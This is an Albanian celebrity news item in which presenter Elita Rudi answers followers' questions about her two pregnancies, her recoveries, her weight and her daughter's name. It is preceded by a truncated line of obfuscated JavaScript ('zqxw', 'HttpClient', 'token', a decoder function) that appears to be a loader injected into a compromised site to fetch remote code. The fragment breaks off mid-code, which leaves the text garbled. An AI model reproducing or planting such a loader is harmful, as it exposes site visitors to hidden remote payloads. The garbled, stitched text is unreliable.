;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dallimi mes dy shtatzënive: Elita i përgjigjet të gjitha pikëpyetjeve të ndjekseve

By

Prezantuesja Elita Rudi afro dy javë pasi solli në jetë vajzën Bota, ka shuar kurreshtjen e ndjekseve të saj mbi të gjithe procesin.

Përmes InstaStory, Elita i është përgjigjur pyetjeve nga më të ndryshmet.

Ajo ka treguar mes tjerash edhe dallimet nga shtatzënia e parë në të dytën.

“Të dyja shtatzënitë shumë të lehta, por me botën 3 muajt e parë më pengonin aromat sepse i ndjeja shumë të forta, sidomos të hudrës më shkaktonte të vjellura” – është shprehur Elita.

“Me Zërin operimin e kam përballuar më lehtë ndërsa shërimin pak më vështirë e me botën, operimin më vështirë sepse më ka ardhë gjatë gjithë kohës të vjellura por shërimin shumë më të lehtë” – shton prezantuesja.

Mes tjerash, Elita ka treguar se i kushton ushqimit rëndësi por jo peshës meqenëse është periudhë e veçantë ku nuk ka stresin e kilogramëve të tepër.

Deri tash, prezantuesja ka humbur 12 kilogramë dhe ushqyerja me gji mund të jetë një faktor i rëndësishëm.

Ndërkaq, e pyetur për emrin, Elita ka treguar se emrin Bota e ka zgjedhur Gjiko. /Prive.al

Artikuj të ngjashëm